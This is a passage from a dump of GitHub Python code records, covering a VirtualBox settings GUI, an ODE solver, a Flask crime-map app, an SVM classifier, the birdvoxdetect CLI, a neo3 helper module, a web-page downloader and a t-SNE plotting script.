anim\n\n\n","repo_name":"mchuapoco/loan-sharks","sub_path":"poems/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":38018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42011869932","text":"import customtkinter as ctk\nfrom existencecontroller.controller import launch_vboxmanage_lst_command\nfrom gui.guistandard import GuiStandard\n\n\nclass VboxConfigsWidget(GuiStandard):\n\n def __init__(self, master, provisions_configs):\n self.provisions_configs = provisions_configs\n self.vbox_list = launch_vboxmanage_lst_command()\n ctk.CTkFrame.__init__(self, master)\n self.set_fonts()\n self.set_std_dimensions()\n self.initialize_elements()\n self.render_elements()\n\n def set_std_dimensions(self):\n self.padx_std = (20, 20)\n self.pady_std = (10, 10)\n self.pady_up = (10, 0)\n self.pady_down = (0, 10)\n self.pady_title = (10, 2)\n self.pady_entry = (2, 10)\n self.ipadx_std = 10\n self.ipady_std = 10\n self.entry_height_std = 40\n self.sticky_title = 'wn'\n self.sticky_label = 'w'\n self.sticky_entry = 'w'\n self.sticky_frame = 'wens'\n self.sticky_horizontal = 'we'\n\n def set_fonts(self):\n family = 'Sans'\n self.font_std = ctk.CTkFont(family=family, size=18)\n self.warning_font = ctk.CTkFont(family=family, size=11)\n\n def initialize_elements(self):\n self._intialize_subframes()\n self._initialize_vbox_subframe_elements()\n self._initialize_cpus_subframe_elements()\n self._initialize_memory_subframe_elements()\n self._initialize_disk_size_subframe_elements()\n\n def render_elements(self):\n self._render_vbox_subframe_elements()\n self._render_cpus_subframe_elements()\n self._render_memory_subframe_elements()\n self._render_disk_size_subframe_elements()\n self._render_subframes()\n\n def _intialize_subframes(self):\n self.vbox_subframe = ctk.CTkFrame(self)\n self.cpus_subframe = ctk.CTkFrame(self)\n self.memory_subframe = ctk.CTkFrame(self)\n self.disk_size_subframe = ctk.CTkFrame(self)\n\n def _initialize_vbox_subframe_elements(self):\n self.vbox_name_label = ctk.CTkLabel(\n master=self.vbox_subframe,\n text=\"Virtual box name:\",\n font=self.font_std\n )\n self.vbox_name_entry = ctk.CTkEntry(\n master=self.vbox_subframe,\n font=self.font_std,\n height=self.entry_height_std,\n placeholder_text='Virtualbox name to be created'\n )\n if self.provisions_configs[\"configurations\"]['vbox_name'][\"default\"]:\n self.vbox_name_entry.insert(\n 0,\n self.provisions_configs[\"configurations\"]['vbox_name'][\"default\"]\n )\n self.warning_label_vbox = ctk.CTkLabel(\n master=self.vbox_subframe,\n font=self.warning_font,\n text=\"\"\n )\n self.vbox_name_entry.bind(\"\", self._vbox_name_check)\n self.vbox_name_entry.bind(\"\", self._vbox_name_check)\n self.warning_label_vbox = ctk.CTkLabel(\n master=self.vbox_subframe,\n font=self.warning_font,\n text_color='red',\n text=\"\"\n )\n if self.provisions_configs[\"configurations\"]['vbox_name'] in self.vbox_list:\n self.warning_label_vbox.configure(\n text='A box with this name already exists',\n )\n\n def _initialize_cpus_subframe_elements(self):\n self.cpus_label = ctk.CTkLabel(\n master=self.cpus_subframe,\n font=self.font_std,\n text='Specify CPUs number'\n )\n self.cpus_value = ctk.IntVar()\n self.cpus_value.set(2)\n if self.provisions_configs[\"configurations\"][\"cpus\"][\"default\"]:\n self.cpus_value.set(\n int(self.provisions_configs[\"configurations\"][\"cpus\"][\"default\"])\n )\n self.cpus_slider = ctk.CTkSlider(\n master=self.cpus_subframe,\n variable=self.cpus_value,\n from_=1,\n to=8,\n number_of_steps=7,\n command=self._show_cpus_slider_value\n )\n self.cpus_slider_label = ctk.CTkLabel(\n master=self.cpus_subframe,\n text=\"\",\n width=250\n )\n\n def _initialize_memory_subframe_elements(self):\n self.memory_label = ctk.CTkLabel(\n master=self.memory_subframe,\n font=self.font_std,\n text='Specify Memory in MB'\n )\n self.memory_var = ctk.IntVar()\n self.memory_var.set(8192)\n if self.provisions_configs[\"configurations\"][\"memory\"][\"default\"]:\n self.memory_var.set(\n int(self.provisions_configs[\"configurations\"][\"memory\"][\"default\"])\n )\n self.memory_slider = ctk.CTkSlider(\n master=self.memory_subframe,\n variable=self.memory_var,\n from_=2,\n to=16384,\n number_of_steps=8191,\n command=self._show_memory_slider_value\n )\n\n self.combo_value_memory = ctk.CTkComboBox(\n master=self.memory_subframe,\n variable=self.memory_var,\n font=self.font_std,\n values=[\"2\", \"4\", \"8\", \"16\", \"32\", \"64\", \"128\", \"256\", \"512\",\n \"1024\", \"2048\", \"4096\", \"8192\", \"16384\"],\n command=self._show_memory_slider_value\n )\n self.slider_memory_label = ctk.CTkLabel(\n self.memory_subframe,\n text=\"\",\n )\n self.combo_value_memory.bind(\n '',\n self._show_memory_value_with_keyrelease\n )\n\n def _initialize_disk_size_subframe_elements(self):\n self.disk_label = ctk.CTkLabel(\n master=self.disk_size_subframe,\n font=self.font_std,\n text='Specify Disk Size in MB'\n )\n self.disk_slider_value = ctk.IntVar()\n self.disk_slider_value.set(30)\n self.disk_slider = ctk.CTkSlider(\n master=self.disk_size_subframe,\n variable=self.disk_slider_value,\n from_=4,\n to=2048,\n number_of_steps=2044,\n command=self._show_disk_size_value\n )\n self.disk_entry = ctk.CTkEntry(\n master=self.disk_size_subframe,\n font=self.font_std,\n )\n if self.provisions_configs[\"configurations\"][\"disk_size\"][\"default\"]:\n self.disk_slider_value.set(\n int(self.provisions_configs[\"configurations\"][\"disk_size\"][\"default\"])\n )\n self.disk_entry.insert(\n 0,\n self.disk_slider_value.get()\n )\n self.disk_slider_label = ctk.CTkLabel(\n master=self.disk_size_subframe,\n text=\"\",\n width=250\n )\n self.disk_entry.bind(\n '',\n self._show_disk_size_value_with_keyrelease\n )\n self.disk_slider.bind(\n '',\n self._set_disk_size_entry\n )\n self.disk_slider.bind(\n '',\n self._set_disk_size_entry\n )\n\n def _render_subframes(self):\n self.columnconfigure(0, weight=1)\n self.rowconfigure(0, weight=1)\n self.rowconfigure(1, weight=1)\n self.rowconfigure(2, weight=1)\n self.rowconfigure(3, weight=1)\n self.vbox_subframe.grid(\n row=0,\n column=0,\n sticky=self.sticky_frame,\n padx=self.padx_std,\n pady=self.pady_up\n )\n self.cpus_subframe.grid(\n row=1,\n column=0,\n sticky=self.sticky_frame,\n padx=self.padx_std,\n pady=self.pady_up\n )\n self.memory_subframe.grid(\n row=2,\n column=0,\n sticky=self.sticky_frame,\n padx=self.padx_std,\n pady=self.pady_up\n )\n self.disk_size_subframe.grid(\n row=3,\n column=0,\n sticky=self.sticky_frame,\n padx=self.padx_std,\n pady=self.pady_std\n )\n\n def _render_vbox_subframe_elements(self):\n self.vbox_subframe.columnconfigure(0, weight=1)\n self.vbox_subframe.rowconfigure(0, weight=1)\n self.vbox_subframe.rowconfigure(1, weight=1)\n self.vbox_subframe.rowconfigure(2, weight=1)\n self.vbox_name_label.grid(\n row=0,\n column=0,\n columnspan=2,\n padx=self.padx_std,\n pady=self.pady_title,\n sticky=self.sticky_label\n )\n self.vbox_name_entry.grid(\n row=1,\n column=0,\n padx=self.padx_std,\n pady=self.pady_entry,\n sticky=self.sticky_horizontal\n )\n self.warning_label_vbox.grid(\n row=2,\n column=0,\n padx=self.padx_std,\n pady=0,\n sticky=self.sticky_label\n )\n self.warning_label_vbox.grid(\n row=2,\n column=0,\n padx=self.padx_std,\n pady=0,\n sticky=self.sticky_label\n )\n\n def _render_cpus_subframe_elements(self):\n self.cpus_subframe.columnconfigure(0, weight=1)\n self.cpus_subframe.rowconfigure(0, weight=1)\n self.cpus_subframe.rowconfigure(1, weight=1)\n self.cpus_subframe.rowconfigure(2, weight=1)\n self.cpus_label.grid(\n row=0,\n column=0,\n sticky=self.sticky_label,\n padx=self.padx_std,\n pady=self.pady_title\n )\n self.cpus_slider.grid(\n row=1,\n column=0,\n sticky=self.sticky_horizontal,\n padx=self.padx_std,\n pady=self.pady_title\n )\n self.cpus_slider_label.grid(\n row=2,\n column=0,\n padx=self.padx_std,\n pady=self.pady_std\n )\n self._show_cpus_slider_value(self.cpus_slider.get())\n\n def _render_memory_subframe_elements(self):\n self.memory_subframe.columnconfigure(0, weight=1)\n self.memory_subframe.columnconfigure(1, weight=0)\n self.memory_subframe.rowconfigure(0, weight=1)\n self.memory_subframe.rowconfigure(1, weight=1)\n self.memory_subframe.rowconfigure(2, weight=1)\n self.memory_label.grid(\n row=0,\n column=0,\n sticky=self.sticky_label,\n padx=self.padx_std,\n pady=self.pady_title\n )\n self.memory_slider.grid(\n row=1,\n column=0,\n sticky=self.sticky_horizontal,\n padx=self.padx_std,\n pady=self.pady_title\n )\n self.combo_value_memory.grid(\n row=1,\n column=1,\n sticky=self.sticky_entry,\n padx=self.padx_std,\n pady=self.pady_title\n )\n self._show_memory_slider_value(self.memory_slider.get())\n\n def _render_disk_size_subframe_elements(self):\n self.disk_size_subframe.columnconfigure(0, weight=1)\n self.disk_size_subframe.columnconfigure(1, weight=0)\n self.disk_size_subframe.rowconfigure(0, weight=1)\n self.disk_size_subframe.rowconfigure(1, weight=1)\n self.disk_size_subframe.rowconfigure(2, weight=1)\n self.disk_label.grid(\n row=0,\n column=0,\n sticky=self.sticky_label,\n padx=self.padx_std,\n pady=self.pady_title\n )\n self.disk_slider.grid(\n row=1,\n column=0,\n sticky=self.sticky_horizontal,\n padx=self.padx_std,\n pady=self.pady_title\n )\n self.disk_entry.grid(\n row=1,\n column=1,\n padx=self.padx_std,\n pady=self.pady_entry,\n sticky=self.sticky_entry\n )\n self.disk_slider_label.grid(\n row=2,\n column=0,\n columnspan=2,\n padx=self.padx_std,\n pady=self.pady_std\n )\n self.slider_memory_label.grid(\n row=2,\n column=0,\n columnspan=2,\n padx=self.padx_std,\n pady=self.pady_std\n )\n self._show_disk_size_value(self.disk_slider_value.get())\n\n def _vbox_name_check(self, event):\n vbox_name_typed = self.vbox_name_entry.get()\n if vbox_name_typed not in self.vbox_list:\n self.vbox_name_entry.configure(border_color=[\"#979DA2\", \"#565B5E\"])\n self.warning_label_vbox.configure(\n text='',\n )\n if vbox_name_typed in self.vbox_list:\n self.vbox_name_entry.configure(border_color='red')\n self.warning_label_vbox.configure(\n text='A virtualbox with this name already exists',\n text_color='red'\n )\n\n def _show_cpus_slider_value(self, cpus_value):\n if cpus_value:\n self.cpus_slider_label.configure(\n font=self.font_std,\n text=f'CPUs Selected: {int(cpus_value)}'\n )\n\n def _show_memory_slider_value(self, memory_value):\n if memory_value:\n self.slider_memory_label.configure(\n font=self.font_std,\n text=f'Selected Value: {int(self.memory_var.get())} MB'\n )\n\n def _show_memory_value_with_keyrelease(self, event):\n self._show_memory_slider_value(self.memory_var.get())\n\n def _show_disk_size_value(self, disk_value):\n if disk_value:\n value_text = f'{self.disk_slider_value.get()} MB'\n if self.disk_slider_value.get() >= 1024:\n disk_value = self.disk_slider_value.get() / 1_024\n value_text = f'{disk_value:.2f} GB'\n if disk_value >= 1024:\n disk_value = self.disk_slider_value.get() / 1_048_576\n value_text = f'{disk_value:.2f} TB'\n self.disk_slider_label.configure(\n font=self.font_std,\n text=f'Disk Size: {value_text}'\n )\n\n def _set_disk_size_entry(self, event):\n self.disk_entry.delete(0, 100)\n self.disk_entry.insert(0, self.disk_slider_value.get())\n\n def _show_disk_size_value_with_keyrelease(self, event):\n self.disk_slider_value.set(int(self.disk_entry.get()))\n self._show_disk_size_value(int(self.disk_entry.get()))\n","repo_name":"shonc23/vmbuilder","sub_path":"app/gui/widgets/vboxconfigswidget.py","file_name":"vboxconfigswidget.py","file_ext":"py","file_size_in_byte":14319,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18705680277","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\nclass ODEsolver():\n\tdef __init__(self, t0, tf, delta, x0, y0,functions):\n\t\tself.x = [x0]\n\t\tself.y = [y0]\n\t\tself.functions = functions\n\t\tself.f = functions[0]\n\t\tself.g = functions[1]\n\t\tself.tvals = [t0,tf]\n\t\tself.delta = delta\n\t\tself.n = int(((tf-t0)/delta)) + 1\n\tdef solve(self):\n\t\tfor i in range(1,self.n):\n\t\t\tself.x = np.append(self.x , self.delta*(self.f(self.x[i-1],self.y[i-1])) + self.x[i-1])\n\t\t\tself.y = np.append(self.y , self.delta*(self.g(self.x[i-1],self.y[i-1])) + self.y[i-1])\n\t\treturn self.x, self.y\n\ndef f(x,y):\n\treturn 1 - 4*x + (y*x*x)\ndef g(x,y,):\n\treturn (3*x) - (y*x*x)\n\t\nfunctions = [f,g]\n\node1 = ODEsolver(0.0,500.0,.01,1.5,3.0,functions)\nx,y = ode1.solve()\ntvals = np.linspace(0,500,50001)\nplt.figure(1)\nplt.subplot(121)\nplt.xlabel(\"t\")\nplt.ylabel(\"x(t) blue, y(t) red\")\nplt.plot(tvals,x, color = 'b')\nplt.plot(tvals,y, color = 'r')\n\nplt.subplot(122)\nplt.xlabel(\"x\")\nplt.ylabel(\"y\")\nplt.plot(x,y)\nplt.show()","repo_name":"notabelardoriojas/FSU-Projects-and-Assignments","sub_path":"2019 - Programming for Scientific Applications (Python)/08_Solving ODEs/riojaslab6.py","file_name":"riojaslab6.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74049924328","text":"#!/usr/bin/env python\n\nfrom dbhelper import DBHelper\nfrom flask import Flask\nfrom flask import render_template\nfrom flask import request\nfrom flask import jsonify\nfrom flask import flash, redirect, url_for\nimport traceback\nimport dbconfig\nimport json\nimport dateparser\nimport datetime\nimport string\n\nif dbconfig.test:\n from mockdbhelper import MockDBHelper as DBHelper\nelse:\n from dbhelper import DBHelper\n\napp = Flask(__name__)\nDB = DBHelper()\n\ncategories = [\"mugging\", \"break-in\"]\n\n@app.route(\"/\")\ndef home(error_message=None):\n crimes = []\n try:\n crimes = DB.get_all_crimes()\n crimes = json.dumps(crimes)\n except Exception as e:\n print(traceback.format_exc())\n return render_template(\"home.html\", crimes=crimes, categories=categories\n , error_message=error_message)\n\n\n@app.route(\"/add\",methods=[\"POST\"])\ndef add():\n try:\n data = request.form.get(\"userinput\")\n DB.add_input(data)\n except Exception as e:\n print(traceback.format_exc())\n return home()\n\n@app.route(\"/clear\")\ndef clear():\n try:\n DB.clear_all()\n except Exception as e:\n print(traceback.format_exc())\n return home()\n\n@app.route(\"/submitcrime\",methods=[\"POST\"])\ndef submitcrime():\n category = request.form.get(\"category\")\n if category not in categories:\n flash(\"%s not in categories:%s\" %(category, categories))\n return redirect(url_for(\"home\"))\n date = request.form.get(\"date\")\n if not date:\n return home(\"Invaild date. please use yyyy-mm-dd format\")\n try:\n latitude = float(request.form.get(\"latitude\"))\n longitude = float(request.form.get(\"longitude\"))\n except ValueError:\n flash(traceback.format_exc())\n return redirect(url_for(\"home\"))\n description = request.form.get(\"description\")\n description = sanitize_string(description)\n DB.add_crime(category,date,latitude,longitude,description)\n return home()\n\n\n@app.route(\"/cookies\")\ndef cookies():\n cookies_str = \";\".join([str(x)+\"=\"+str(y) for x,y in request.cookies.items()])\n return cookies_str\n\n\n@app.route(\"/ip\")\ndef ip():\n return jsonify({\"ip\": request.remote_addr}),200\n\n\ndef format_date(userdata):\n date = dateparser.parse(userdata)\n try:\n return datetime.datetime.strftime(date, \"%Y-%m-%d\")\n except TypeError:\n return None\n\n\ndef sanitize_string(userinput):\n whitelist = string.ascii_letters + string.digits + \" !?$.,;-'&\"\"\"\n return filter(lambda x: x in whitelist, userinput)\n\nif __name__ == \"__main__\":\n app.run(port=5000,debug=True)\n","repo_name":"gufengxiaoyuehan/crimemap","sub_path":"crimemap.py","file_name":"crimemap.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12927350463","text":"import numpy as np\nimport pandas\n#from subprocess import check_call\n#import seaborn as sns \n#from matplotlib import pyplot as plt \n# from sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import accuracy_score, precision_recall_fscore_support\nfrom sklearn.svm import SVC\n#from sklearn.model_selection import GridSearchCV\nfrom confusion_mat import conf_matrix\nfrom sklearn.metrics import roc_curve, auc\nimport matplotlib.pyplot as plt\n\ndef svm(X_train, y_train, X_test, y_test):\n\n # X_train['Sex'],_ = pandas.factorize(X_train['Sex'])\n # X_train['Sport'],_ = pandas.factorize(X_train['Sport'])\n # X_train['NOC'],_ = pandas.factorize(X_train['NOC'])\n # X_train['Host_Country'],_=pandas.factorize(X_train['Host_Country'])\n # y_train['Medal'],_ = pandas.factorize(y_train['Medal'])\n # X_test['Sex'],_ = pandas.factorize(X_test['Sex'])\n # X_test['Sport'],_ = pandas.factorize(X_test['Sport'])\n # X_test['NOC'],_ = pandas.factorize(X_test['NOC'])\n # y_test['Medal'],_ = pandas.factorize(y_test['Medal'])\n # X_test['Host_Country'],_=pandas.factorize(X_test['Host_Country'])\n # params = grid_search(X_train, y_train.values.ravel())\n svclassification(X_train, y_train.values.ravel(), X_test, y_test.values.ravel())\n'''\ndef grid_search(X_train, Y_train):\n print(\"3\")\n parameters = {'kernel':('linear', 'rbf','poly', 'sigmoid'),\n 'C':[1, 5, 10, 50, 100],\n 'gamma':['scale',0.25, .5], 'degree':[1, 2, 4]}\n print(\"4\")\n svc = SVC()\n print(\"5\")\n clf = GridSearchCV(svc, parameters)\n print(\"6\")\n clf.fit(X_train[:100], Y_train[:100])\n print(\"7\")\n print(clf.best_params_)\n print(\"end\")\n return clf.best_params_['kernel']\n'''\ndef svclassification(X_train, y_train, X_test, y_test):\n params = ['linear']#, 'rbf']\n accuracy_dict = {}\n for param in params:\n clf = SVC(kernel = param, class_weight='balanced', probability=True)\n clf.fit(X_train, y_train)\n predict = clf.predict(X_test)\n accuracy = accuracy_score(y_test, predict) * 100\n accuracy_dict[param] = accuracy\n print('\\nAccuracy: ', accuracy)\n precision, recall, fscore, support = precision_recall_fscore_support(y_test, predict, average = 'micro')\n print('\\nPrecision: ', precision, '\\nRecall: ', recall, '\\nF-score: ', fscore)\n conf_matrix(y_test,predict)\n # max_accuracy = max([accuracy_dict[param] for param in accuracy_dict])\n # #print(\"\\n max accuracy: \",max_accuracy, \" for kernel: \",str(param for param in accuracy_dict if accuracy_dict[param] == max_accuracy))\n # Compute ROC curve and ROC area for each class\n fpr = dict()\n tpr = dict()\n roc_auc = dict()\n n_class = y_test.shape\n print(list(n_class)[0],y_test,predict)\n for i in range(list(n_class)[0]):\n fpr[i], tpr[i], _ = roc_curve(y_test, predict)\n roc_auc[i] = auc(fpr[i], tpr[i])\n # Compute micro-average ROC curve and ROC area\n fpr[\"micro\"], tpr[\"micro\"], _ = roc_curve(y_test.ravel(), predict.ravel())\n roc_auc[\"micro\"] = auc(fpr[\"micro\"], tpr[\"micro\"])\n plt.figure()\n lw = 2\n plt.plot(fpr[2], tpr[2], color='darkorange',\n lw=lw, label='ROC curve (area = %0.2f)' % roc_auc[2])\n plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.05])\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title('Receiver operating characteristic example')\n plt.legend(loc=\"lower right\")\n plt.show()\n","repo_name":"adityajoshi2k7/Analysing-Olympics-Medal-Tally","sub_path":"svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4886136150","text":"from __future__ import print_function\nfrom argparse import ArgumentParser, RawDescriptionHelpFormatter, ArgumentTypeError\nfrom collections.abc import Iterable\nimport logging\nimport numpy as np\nimport os\nfrom six import string_types\nimport sys\n\nimport birdvoxdetect\nfrom birdvoxdetect.birdvoxdetect_exceptions import BirdVoxDetectError\n\n# The following line circumvent issue #1715 in xgboost\nos.environ[\"KMP_DUPLICATE_LIB_OK\"] = \"True\"\n\n\ndef get_file_list(input_list):\n \"\"\"Parse list of input paths.\"\"\"\n if not isinstance(input_list, Iterable) or isinstance(input_list, string_types):\n raise ArgumentTypeError(\"input_list must be a non-string iterable\")\n file_list = []\n for item in input_list:\n if os.path.isfile(item):\n file_list.append(os.path.abspath(item))\n elif os.path.isdir(item):\n for fname in os.listdir(item):\n path = os.path.join(item, fname)\n if os.path.isfile(path):\n file_list.append(path)\n else:\n raise BirdVoxDetectError(\"Could not find input at path {}\".format(item))\n\n return file_list\n\n\ndef run(\n inputs,\n output_dir=None,\n export_clips=False,\n export_confidence=False,\n export_faults=False,\n export_logger=False,\n predict_proba=False,\n threshold=50.0,\n suffix=\"\",\n clip_duration=1.0,\n logger_level=logging.INFO,\n):\n verbose = True\n if isinstance(inputs, string_types):\n file_list = [inputs]\n elif isinstance(inputs, Iterable):\n file_list = get_file_list(inputs)\n else:\n raise BirdVoxDetectError(\"Invalid input: {}\".format(str(inputs)))\n\n if len(file_list) == 0:\n print(\"birdvoxdetect: No WAV files found in {}. Aborting.\".format(str(inputs)))\n sys.exit(-1)\n\n # Print header\n if verbose:\n if threshold:\n print(\"birdvoxdetect: Threshold = {:4.1f}\".format(threshold))\n\n if output_dir:\n print(\"birdvoxdetect: Output directory = \" + output_dir)\n\n if not suffix == \"\":\n print(\"birdvoxdetect: Suffix string = \" + suffix)\n\n if export_clips:\n export_clips_str = \"\".join(\n [\n \"Duration of exported clips = \",\n \"{:.2f} seconds.\".format(clip_duration),\n ]\n )\n print(\"birdvoxdetect: \" + export_clips_str)\n\n # Process all files in the arguments\n for filepath in file_list:\n if verbose:\n print(\"birdvoxdetect: Processing: {}\".format(filepath))\n birdvoxdetect.process_file(\n filepath,\n clip_duration=clip_duration,\n export_clips=export_clips,\n export_confidence=export_confidence,\n export_faults=export_faults,\n export_logger=export_logger,\n logger_level=logger_level,\n output_dir=output_dir,\n predict_proba=predict_proba,\n suffix=suffix,\n threshold=threshold,\n )\n if verbose:\n print(\"birdvoxdetect: Done.\")\n\n\ndef parse_args(args):\n parser = ArgumentParser(\n sys.argv[0],\n description=main.__doc__,\n formatter_class=RawDescriptionHelpFormatter,\n )\n\n parser.add_argument(\n \"inputs\",\n nargs=\"*\",\n help=\"Path or paths to files to process, or path to \"\n \"a directory of files to process.\",\n )\n\n parser.add_argument(\n \"--output-dir\",\n \"-o\",\n default=None,\n help=\"Directory to save the output file(s); \"\n \"The default value is the same directory as the input \"\n \"file(s).\",\n )\n\n parser.add_argument(\n \"--export-clips\",\n \"-c\",\n action=\"store_true\",\n help=\"Export detected events as audio clips in WAV format.\",\n )\n\n parser.add_argument(\n \"--export-confidence\",\n \"-C\",\n action=\"store_true\",\n help=\"Export the time series of model confidence values of events\"\n \"in HDF5 format.\",\n )\n\n parser.add_argument(\n \"--export-faults\",\n \"-f\",\n action=\"store_true\",\n help=\"Export list of sensor faults in CSV format.\",\n )\n\n parser.add_argument(\n \"--export-logger\",\n \"-l\",\n action=\"store_true\",\n help=\"Export output of Python logger in TXT format.\",\n )\n\n parser.add_argument(\n \"--threshold\",\n \"-t\",\n type=valid_threshold,\n default=50,\n help=\"Detection threshold, between 10 and 90. \"\n \"The default value is 50. \"\n \"Greater values lead to higher precision at the expense \"\n \"of a lower recall.\",\n )\n\n parser.add_argument(\n \"--suffix\",\n \"-s\",\n default=\"\",\n help=\"String to append to the output filenames.\"\n \"The default value is the empty string.\",\n )\n\n parser.add_argument(\n \"--clip-duration\",\n \"-d\",\n type=positive_float,\n default=None,\n help=\"Duration of the exported clips, expressed in seconds (fps). \"\n \"The default value is 1.0, that is, one second. \"\n \"We recommend values of 0.5 or above.\",\n )\n\n parser.add_argument(\n \"--predict-proba\",\n \"-p\",\n action=\"store_true\",\n help=\"Export output probabilities as a JSON container.\",\n )\n\n parser.add_argument(\n \"--quiet\", \"-q\", action=\"store_true\", help=\"Print less messages on screen.\"\n )\n\n parser.add_argument(\n \"--verbose\",\n \"-v\",\n action=\"store_true\",\n help=\"Print timestamps of detected events.\",\n )\n\n parser.add_argument(\n \"--version\", \"-V\", action=\"store_true\", help=\"Print version number.\"\n )\n\n if args == []:\n parser.print_help(sys.stdout)\n return \"\"\n\n args = parser.parse_args(args)\n\n if args.quiet and args.verbose:\n raise BirdVoxDetectError(\n \"Command-line flags --quiet (-q) and --verbose (-v) \"\n \"are mutually exclusive.\"\n )\n\n if args.clip_duration is None:\n args.clip_duration = 1.0\n elif not args.export_clips:\n raise BirdVoxDetectError(\n \"The --export-clips (-c) flag should be present \"\n \"if the --clip-duration (-d) flag is present.\"\n )\n\n return args\n\n\ndef main():\n \"\"\"\n Extracts nocturnal flight calls from audio by means of the BirdVoxDetect\n deep learning model (Lostanlen et al. 2019).\n \"\"\"\n args = parse_args(sys.argv[1:])\n\n if args == \"\":\n return\n\n if args.version:\n print(birdvoxdetect.version.version)\n return\n\n if args.quiet:\n logger_level = 30\n elif args.verbose:\n logger_level = 10\n else:\n logger_level = 25\n\n run(\n args.inputs,\n output_dir=args.output_dir,\n export_clips=args.export_clips,\n export_confidence=args.export_confidence,\n export_faults=args.export_faults,\n export_logger=args.export_logger,\n predict_proba=args.predict_proba,\n threshold=args.threshold,\n suffix=args.suffix,\n clip_duration=args.clip_duration,\n logger_level=logger_level,\n )\n\n\ndef positive_float(value):\n \"\"\"An argparse-like method for accepting only positive number\"\"\"\n try:\n fvalue = float(value)\n except (ValueError, TypeError) as e:\n raise ArgumentTypeError(\n \"Expected a positive float, error message: {}\".format(e)\n )\n if np.isnan(fvalue) or fvalue <= 0:\n raise ArgumentTypeError(\"Expected a positive number\")\n return fvalue\n\n\ndef valid_threshold(value):\n \"\"\"An argparse-like method for accepting only floats between 0 and 100\"\"\"\n try:\n fvalue = float(value)\n except (ValueError, TypeError) as e:\n raise ArgumentTypeError(\n \"Expected a positive float, error message: {}\".format(e)\n )\n if np.isnan(fvalue) or fvalue < 0 or fvalue > 100:\n raise ArgumentTypeError(\"Expected a number between 0 and 100\")\n return fvalue\n","repo_name":"BirdVox/birdvoxdetect","sub_path":"birdvoxdetect/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":7982,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"53"} +{"seq_id":"5582835352","text":"from __future__ import annotations\nimport abc\nimport hashlib\nfrom enum import IntEnum\nfrom events import Events # type: ignore\nfrom neo3.core import types\n\n\nmsgrouter = Events()\n\n# :noindex:\n\n\nclass Size(IntEnum):\n \"\"\"\n Explicit bytes of memory consumed\n \"\"\"\n uint8 = 1\n uint16 = 2\n uint32 = 4\n uint64 = 8\n uint160 = 20\n uint256 = 32\n\n\nclass IJson(abc.ABC):\n @abc.abstractmethod\n def to_json(self) -> dict:\n \"\"\" convert object into json \"\"\"\n\n @classmethod\n @abc.abstractmethod\n def from_json(cls, json: dict):\n \"\"\" create object from JSON \"\"\"\n\n\ndef to_script_hash(data: bytes) -> types.UInt160:\n \"\"\"\n Create a script hash based on the input data.\n\n Args:\n data: data to hash\n \"\"\"\n intermediate_data = hashlib.sha256(data).digest()\n data_ = hashlib.new('ripemd160', intermediate_data).digest()\n return types.UInt160(data_)\n","repo_name":"KunJon-analytics/AfricaN3","sub_path":"neo3/core/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37610693620","text":"import os\nimport requests\nimport traceback\n\npodjetja_directory = 'podatki'\n\ndef download_url_to_string(url):\n try:\n page_content = requests.get(url)\n if page_content.status_code == 200:\n return page_content.text\n else:\n raise ValueError(f\"Čudna koda: {page_content.status_code}\")\n except Exception:\n print(f\"Prišlo je do spodnje napake:\\n{traceback.format_exc()}\")\n\ndef save_string_to_file(text, directory, filename):\n os.makedirs(directory, exist_ok=True)\n path = os.path.join(directory, filename)\n with open(path, 'w', encoding='utf-8') as file_out:\n file_out.write(text)\n return None\n\ndef save_frontpage(page, directory, filename):\n html_strani = download_url_to_string(page)\n save_string_to_file(html_strani, directory, filename)\n\ndef url(index):\n return 'https://www.value.today/world-top-1000-companies-as-on-dec-25-2022?title=&field_headquarters_of_company_target_id=All&field_company_category_primary_target_id&field_market_cap_dec_25_2022__value=&page={}'.format(index)\ndef name(index):\n return 'podjetja{}'.format(index)\n\nfor i in range(0,20):\n save_frontpage(url(i), podjetja_directory, name(i)) \n\ndef read_file_to_string(directory, filename):\n path = os.path.join(directory, filename)\n with open(path, 'r', encoding='utf-8') as f:\n return f.read()\n \n\n\n\n\n\n\n\n\n","repo_name":"AnzeKriznar/Projektna-naloga","sub_path":"download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31967130066","text":"from sklearn.manifold import TSNE\nfrom sklearn.datasets import load_iris,load_digits\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\nimport os\nimport numpy as np\nimport random\n\ndef load_data_and_draw(use_sample=False):\n \"\"\"\n @Param use_sample: 是否对O类别进行采样\n \"\"\"\n path = \"prototype_9.npy\"\n digits = np.load(path, allow_pickle=True)[()]\n data, target = [], []\n color_dict = {0: \"r\", 1: \"k\", 2: \"b\", 3: \"g\", 4: \"m\",\n 5: \"c\", 6: \"#ccc\", 7: \"#22cc88\", 8: \"orange\", 9: \"brown\", 10: \"pink\"}\n origin_data = digits[\"data\"].tolist()\n data_len = len(digits[\"data\"])\n origin_target = digits[\"target\"][-data_len:].tolist()\n print(data_len)\n print(len(target))\n for ei, i in enumerate(origin_target):\n if i != -1:\n draw = True\n if use_sample and i == 0:\n if random.random() >= 0.7:\n draw = False\n if draw:\n # print(i)\n target.append(color_dict[i])\n 